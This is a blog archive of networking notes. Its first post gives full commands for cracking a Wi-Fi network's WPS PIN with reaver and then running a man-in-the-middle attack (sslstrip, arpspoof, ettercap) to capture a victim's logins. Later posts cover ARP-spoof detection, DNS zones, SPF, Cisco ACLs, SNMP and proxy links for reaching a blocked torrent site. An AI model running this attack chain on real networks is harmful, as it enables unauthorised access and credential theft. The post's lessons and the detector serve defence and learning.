Archive for the ‘Networking’ Category

Finally I found a nice project for my Raspberry Pi :) I'll write down some notes in this post so the Linux commands are easy to find back later. Please use this documentation only as a white hat hacker and for learning purposes!!!!

First:

To break into a WPS-enabled wireless access point:

  • airmon-ng start wlan0 (creates the monitor interface mon0)
  • wireless-overview (any scan of the nearby access points will do, for example airodump-ng mon0, or wash -i mon0 which lists only the WPS-enabled ones; note the BSSID and channel of the target)
  • reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
  • After roughly 10 hours reaver has brute-forced the WPS PIN and prints the WPA PSK (the 8-digit PIN is verified in two halves and the last digit is a checksum, so there are only 11,000 combinations to try, no matter how strong the passphrase is)

Now configure the wireless with your credentials

  • airmon-ng stop wlan0 (and airmon-ng stop mon0 to remove the monitor interface again)
  • nano /etc/network/interfaces
  • Original file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • New file (one wlan0 stanza is enough, and "iface default" is only used together with wpa-roam, so it is commented out too):
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid "L0g0ff"
wpa-psk "SomePassword"
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet dhcp
  • Keep in mind that /etc/network/interfaces is world-readable, so every local user can read the passphrase. Run wpa_passphrase "L0g0ff" "SomePassword" and put the 64-character psk= value it prints in the wpa-psk line instead (without quotes): that still joins the network, but the file no longer contains the passphrase itself.
  • Now bring up the wireless card: ifup wlan0

Now that the wireless setup is done we turn the Pi into an IP forwarding server, so that we can do man in the middle attacks.

  • echo 1 > /proc/sys/net/ipv4/ip_forward (this is a kernel setting, not a regular file, so write it with echo or with sysctl -w net.ipv4.ip_forward=1 rather than editing it in nano; it is back to 0 after a reboot)
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666

    (needed to redirect all HTTP traffic that arrives at the Pi to SSLStrip; PREROUTING only matches packets coming in from the network, so the Pi's own browsing is not affected)

  • sslstrip -l 666 (do not close this terminal)

Now that the proxy is running we want to ARP spoof, so that the victim's traffic passes through our Pi

  • arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close this terminal)
  • This only poisons the victim's ARP cache, so only traffic from the victim towards the gateway passes through the Pi. For HTTP that is enough, because sslstrip answers the victim itself; to see both directions of other traffic run a second arpspoof with the addresses swapped (-t 192.168.1.1 192.168.1.12).
  • You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your Pi cannot handle all the traffic you will DoS your own network.

And now that everything is set up, the sniffing can begin :)

  • ettercap -m ettercap.log -Tq -i wlan0 (-T is the text interface, -q keeps it quiet and -m writes only the user messages, such as captured credentials, to the log file; don't close the terminal)

The only thing left now is to wait until the victim logs in to a website; the username and password are then written to the ettercap.log file. With grep USER ettercap.log you can see all the captured login credentials.

What did we learn?

  1. Never log in to a website without HTTPS. Watch the address bar: sslstrip rewrites the https links to http, so the browser shows no certificate warning at all, only the padlock is missing. Sites that send an HSTS header cannot be downgraded this way.
  2. Never log in to a website that shows HTTPS (certificate) errors
  3. Always disable WPS on your router; a strong WPA2 passphrase does not help while the PIN can be brute-forced
  4. On company wireless networks always put the wireless clients in a DMZ (a separate, isolated segment), so that a hostile wireless client cannot ARP spoof the wired LAN
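The ARP spoofing step is also the one a defender can see: arpspoof keeps sending replies that nobody asked for, and the gateway's IP suddenly maps to the Pi's MAC. The detector below is an added example, not part of the original post; it reads the text output of tcpdump -n -i wlan0 arp on the victim (or any other host on the same segment) and reports those indicators. The capture, the addresses and the MAC addresses in it are constructed for the example.

```python
"""Spot arpspoof-style ARP cache poisoning in `tcpdump -n arp` output.

Added example for this post, not from the original. Assumes the victim (or any
host on the segment) captures with `tcpdump -n -i wlan0 arp` and feeds the text
to detect_arp_spoof(); the addresses and MACs below are made up.
"""
import re
from collections import defaultdict

# Constructed sample (not a real capture). 192.168.1.1 is the gateway with real
# MAC 00:11:22:33:44:55, 192.168.1.12 the victim, 192.168.1.50 the Raspberry Pi
# (b8:27:eb:12:34:56). From 12:00:10 on the Pi runs
# `arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1`, which sends an unsolicited
# "192.168.1.1 is-at <Pi MAC>" reply to the victim every two seconds.
SAMPLE_CAPTURE = """\
12:00:01.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.12, length 28
12:00:01.000500 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:05.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.12, length 28
12:00:05.000400 ARP, Reply 192.168.1.50 is-at b8:27:eb:12:34:56, length 28
12:00:10.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:12.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:14.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
"""

REQUEST = re.compile(r"^(\S+) ARP, Request who-has (\S+) tell (\S+),")
REPLY = re.compile(r"^(\S+) ARP, Reply (\S+) is-at (\S+),")


def to_seconds(ts):
    """'12:00:10.000000' -> seconds since midnight (enough for one capture)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def detect_arp_spoof(capture, gateway_ip, unsolicited_window=1.0):
    """Return alert strings for three indicators of ARP poisoning.

    1. an IP that was bound to one MAC is suddenly announced with another
       (arpspoof rewrites the gateway entry, so that one is tagged);
    2. one MAC answering for more than one IP (the Pi's own IP plus the
       gateway's); a router doing proxy ARP also triggers this, so it is an
       indicator, not proof;
    3. a reply that no request asked for within unsolicited_window seconds
       (arpspoof never waits for a request; hosts do send a gratuitous ARP at
       boot, so again an indicator).
    Each (indicator, ip, mac) combination is reported once.
    """
    ip_to_mac = {}                 # first MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP a MAC has claimed
    last_request = {}              # ip -> time of the last who-has for it
    alerts, seen = [], set()

    def alert(key, message):
        if key not in seen:
            seen.add(key)
            alerts.append(message)

    for line in capture.splitlines():
        req = REQUEST.match(line)
        if req:
            last_request[req.group(2)] = to_seconds(req.group(1))
            continue
        rep = REPLY.match(line)
        if not rep:
            continue
        ts, ip, mac = rep.group(1), rep.group(2), rep.group(3).lower()
        now = to_seconds(ts)

        known = ip_to_mac.setdefault(ip, mac)
        if known != mac:
            tag = "gateway " if ip == gateway_ip else ""
            alert(("flap", ip, mac), f"{ts} {tag}{ip} moved from {known} to {mac}")

        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alert(("multi", mac), f"{ts} {mac} claims {sorted(mac_to_ips[mac])}")

        asked = last_request.get(ip)
        if asked is None or now - asked > unsolicited_window:
            alert(("unsolicited", ip, mac), f"{ts} unsolicited reply: {ip} is-at {mac}")
    return alerts


if __name__ == "__main__":
    import sys
    # pipe a live capture in: tcpdump -l -n -i wlan0 arp | python3 arpwatch.py -
    text = sys.stdin.read() if sys.argv[1:] == ["-"] else SAMPLE_CAPTURE
    for line in detect_arp_spoof(text, "192.168.1.1"):
        print(line)
```

On the sample the first four lines (normal request/reply pairs) produce no alert; from the first spoofed reply on, all three indicators fire once for the gateway address. In a real network the gratuitous ARP a host sends at boot and a router doing proxy ARP trigger the second and third indicator, so the change of the gateway's MAC is the one to act on.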

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html

The difference between stub zones and secondary DNS zones… it all comes down to replication, efficiency and availability.

Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.

There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.

The above is secondary zone replication.

b) Instead of the above, you receive the addresses of the 100 people in London. You need information in one of the books. You take your car, drive to the address, find the information you need, and drive back to Manchester.

This is a stub zone: the server holds only the SOA, NS and glue A records of the zone, just enough to know which name servers to ask, and every other question still travels to those servers.

So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.

So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).

Hope this helps, first thing that came to my mind.

Thanks to Shinigami
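The two options from the story, written as BIND 9 named.conf zone statements. This is an added example, not part of the post; the zone name example.com and the master address 192.0.2.1 are placeholders. They are alternatives for the same zone, so a real named.conf contains only one of them:

```conf
// Option A: secondary zone (BIND calls it a slave zone). Manchester keeps a
// full copy; every change in London is transferred (AXFR/IXFR), which costs
// bandwidth, but the server keeps answering from its copy when the link to
// London is down, until the expire timer in the SOA record runs out.
zone "example.com" {
    type slave;
    masters { 192.0.2.1; };
    file "sec/example.com";
};

// Option B: stub zone. Only the SOA, NS and glue records are copied, so the
// transfer is tiny, but every real query still travels to the London servers
// and fails when the link is down.
zone "example.com" {
    type stub;
    masters { 192.0.2.1; };
    file "stub/example.com";
};
```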

Maybe it's an illusion, but if everyone used an SPF DNS record for their mail domain, and everyone bounced or filtered mail from domains without SPF, the internet would be spam free :-) Keep in mind that SPF only proves that the sending server is allowed to use the envelope sender domain; a spammer who owns his own domain publishes a perfectly valid SPF record, so SPF stops forgery of your domain rather than spam in general.

Microsoft has a nice wizard to create an SPF record for your own domain: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/
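To make the bounce-or-filter idea concrete, here is an added example (not from the post or from the Microsoft wizard) that evaluates an SPF record for the IP address that delivered a mail and maps the result to the action proposed above. The domains strict.example, lenient.example and nospf.example and their TXT records are constructed; a real checker fetches the record with a DNS query and also resolves the a, mx and include mechanisms, which this one deliberately reports as permerror.

```python
"""Offline SPF evaluation for the ip4/ip6/all mechanisms.

Added example for this post (not from the original or the Microsoft wizard).
The TXT records are constructed for the made-up domains strict.example,
lenient.example and nospf.example; a real implementation fetches them with a
DNS query and also resolves a, mx and include.
"""
import ipaddress

SPF_RECORDS = {
    "strict.example": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all",  # hard fail
    "lenient.example": "v=spf1 ip4:198.51.100.25 ~all",                   # soft fail
    "nospf.example": None,                                                 # no record
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(record, client_ip):
    """Evaluate one SPF record for the IP that delivered the mail.

    Returns an RFC 7208 result: pass, fail, softfail, neutral, none or
    permerror. Only ip4, ip6 and all are evaluated here; a mechanism that
    needs another DNS lookup (a, mx, include, exists, redirect=) yields
    permerror, which is a simplification of this example, not what a full
    checker does.
    """
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in terms[1:]:
        qualifier = "+"                      # no prefix means "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":                    # catch-all, normally the last term
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            network = ipaddress.ip_network(arg, strict=False)
            if ip.version == network.version and ip in network:
                return QUALIFIERS[qualifier]
            continue
        return "permerror"                   # needs DNS: a, mx, include, ...
    return "neutral"                         # RFC 7208: nothing matched, no "all"


def post_policy(result):
    """The policy the post proposes: bounce hard failures and domains without
    (or with a broken) SPF record, filter the doubtful rest, deliver a pass."""
    if result in ("fail", "none", "permerror"):
        return "bounce"
    if result in ("softfail", "neutral"):
        return "filter"
    return "deliver"


def classify(domain, client_ip):
    """Look up the (constructed) record for domain; return (spf result, action)."""
    result = check_spf(SPF_RECORDS.get(domain), client_ip)
    return result, post_policy(result)
```

The difference between -all and ~all is exactly the difference between "bounce" and "filter": a domain owner who ends the record with ~all asks receivers not to reject outright, which is why many mail servers only add a spam score on softfail.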

A link to a very nice bandwidth calculator: http://web.forret.com/tools/bandwidth.asp?speed=4&unit=TB%2Fm

  • First check which access list is applied, with show run
  • Then check the dialer interface:

!
interface Dialer1
description Internet
ip address negotiated
ip access-group 111 in
ip nat outside
ip inspect list1 out
ip virtual-reassembly

  • Copy the ip access-group line (the one above) to notepad
  • Now do a show run and copy the specific access list (111 in my case) to notepad

access-list 111 permit tcp any any established
access-list 111 permit icmp any any administratively-prohibited
access-list 111 permit icmp any any echo
access-list 111 permit icmp any any echo-reply
access-list 111 permit icmp any any packet-too-big
access-list 111 permit icmp any any time-exceeded
access-list 111 permit icmp any any traceroute
access-list 111 permit icmp any any unreachable
access-list 111 permit tcp any any eq ftp
access-list 111 permit tcp any any eq www
access-list 111 deny   ip any any log

  • Now add the new line (permit tcp any any eq 443 in my case) to the ACL, still in notepad, before the final deny line. IOS stops at the first matching line, so a permit placed after deny ip any any is never reached.

access-list 111 permit tcp any any established
access-list 111 permit icmp any any administratively-prohibited
access-list 111 permit icmp any any echo
access-list 111 permit icmp any any echo-reply
access-list 111 permit icmp any any packet-too-big
access-list 111 permit icmp any any time-exceeded
access-list 111 permit icmp any any traceroute
access-list 111 permit icmp any any unreachable
access-list 111 permit tcp any any eq ftp
access-list 111 permit tcp any any eq www
access-list 111 permit tcp any any eq 443
access-list 111 deny   ip any any log

  • now type conf t
  • and type interface dialer1
  • now temporarily disable the access list with: no ip access-group 111 in (while the list is rebuilt line by line, the implicit deny at the end of the half-finished list would otherwise block all traffic, possibly including your own session)
  • type exit to leave the Dialer1 interface
  • type no access-list 111 to clear the current ACL
  • Paste the new modified ACL from notepad to your router
  • Type interface dialer1
  • Type ip access-group 111 in to enable the new access list
  • Type end to leave configuration mode
  • Test the new rule
  • Type wr mem to write the running config from RAM to NVRAM (the startup-config), otherwise the change is gone after the next reboot

On IOS releases that support ACL sequence numbers there is a shorter way: ip access-list extended 111, then a line such as 105 permit tcp any any eq 443 inserts the rule before entry 110 (the deny) without removing the list at all.
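The whole procedure, including the ordering rule for the new line, as an added example that is not part of the post: a Python script that takes the ACL as pasted from show run, inserts the new rule before the catch-all deny and emits the command sequence above ready to paste. The interface name Dialer1, the direction in and the rule for port 443 are the post's values and are parameters of the function.

```python
"""Build the IOS command sequence that the post types by hand.

Added example for this post, not from the original. The ACL text is the one
shown above (pasted from `show run`); the interface, direction and the rule to
add are parameters with the post's values as defaults.
"""

CURRENT_ACL = """\
access-list 111 permit tcp any any established
access-list 111 permit icmp any any administratively-prohibited
access-list 111 permit icmp any any echo
access-list 111 permit icmp any any echo-reply
access-list 111 permit icmp any any packet-too-big
access-list 111 permit icmp any any time-exceeded
access-list 111 permit icmp any any traceroute
access-list 111 permit icmp any any unreachable
access-list 111 permit tcp any any eq ftp
access-list 111 permit tcp any any eq www
access-list 111 deny   ip any any log
"""


def _words(line):
    """Compare ACL lines by their words so extra spaces do not matter."""
    return line.split()


def insert_rule(acl_text, new_rule):
    """Return the ACL lines with new_rule inserted before the catch-all deny.

    IOS evaluates an ACL top-down and stops at the first match, so a permit
    pasted after "deny ip any any" is dead. If the rule is already present the
    list is returned unchanged.
    """
    lines = [l.strip() for l in acl_text.splitlines() if l.strip()]
    if _words(new_rule) in map(_words, lines):
        return lines
    for i, line in enumerate(lines):
        if _words(line)[2:6] == ["deny", "ip", "any", "any"]:
            return lines[:i] + [new_rule.strip()] + lines[i:]
    return lines + [new_rule.strip()]


def acl_number(lines):
    """The ACL number all lines share (refuse a paste that mixes two lists)."""
    numbers = {_words(l)[1] for l in lines}
    if len(numbers) != 1:
        raise ValueError(f"lines belong to different ACLs: {sorted(numbers)}")
    return numbers.pop()


def ios_commands(acl_text, new_rule, interface="Dialer1", direction="in"):
    """The post's procedure as one paste-able command list."""
    lines = insert_rule(acl_text, new_rule)
    number = acl_number(lines)
    return (
        ["conf t",
         f"interface {interface}",
         # unbind first: while the list is rebuilt line by line the implicit
         # deny at its end would block everything not yet re-added, which can
         # cut off the session you are typing in
         f"no ip access-group {number} {direction}",
         "exit",
         f"no access-list {number}"]
        + lines
        + [f"interface {interface}",
           f"ip access-group {number} {direction}",
           "end",
           "wr mem"]
    )


if __name__ == "__main__":
    print("\n".join(ios_commands(CURRENT_ACL, "access-list 111 permit tcp any any eq 443")))
```

Running it prints the 21 commands in the order of the list above; pasting the same rule twice is harmless because insert_rule leaves a list that already contains it alone.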

If you want to know which OID returns a specific SNMP value, snmpwalk is your friend :) The command below walks the whole tree under 1.3 and prints the OIDs numerically (-On), so you can grep for the value and read off its OID:

snmpwalk -v1 -c <snmp community name> -On <ip server> 1.3

Download SNMPWALK for windows


XS4ALL and Ziggo block my favorite torrent site :(

Try this (Dutch): http://www.ikwilthepiratebay.nl

-or-

http://malaysiabay.org/

-or-

This http://www.alwaysapirate.org/index.php and type http://thepiratebay.se/

-or-

This: http://thepiratebay.se.proxy.piratenpartij.nl/ (temporarily down… :( )

-or-

Here you can find some alternative proxies:

http://hidemyass.com/?http://www.thepiratebay.org

Click on the yellow URL, and then on the yellow Hide My Ass button:

http://depiratebay.nl/
http://tpb.makinit.nl/
http://thepiratebay2.nl/
http://www.anti-brein.nl/piratebay/
http://tpb.dehomies.nl/
http://anonymouse.org/cgi-bin/anon-www.cgi/http://thepiratebay.se/

And if you want to run a mirror on your own WordPress blog, check RePress: http://wordpress.org/extend/plugins/repress/

Be careful, so make a backup of the snmpd config file first.

[root@linux ~]# mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.org

Create a new config file.

[root@linux ~]# nano /etc/snmp/snmpd.conf
rocommunity  public IPMonitorServer
syslocation  "Webserver, WAPNET"
syscontact  some@email.com

Start the snmpd service and enable it at boot. Note that the third field of the rocommunity line (IPMonitorServer) restricts the community to that one host, so keep it: "public" is the default community name every scanner tries first, and SNMP v1/v2c send the community name in clear text, so pick a non-default name or, better, use SNMPv3 (createUser and rouser in snmpd.conf).

[root@linux ~]# /etc/init.d/snmpd start
[root@linux ~]# chkconfig snmpd on

Sometimes you need a proxy server and you don't want to install any software. Then you can download and run Proxomitron (zip package). The only thing you must change is the IP address that is allowed to connect to the proxy.

If you use a lot of remote desktop connections, visionapp is a very nice freeware tool to manage them. You can also manage SSH, Telnet, VNC and ICA sessions with it.
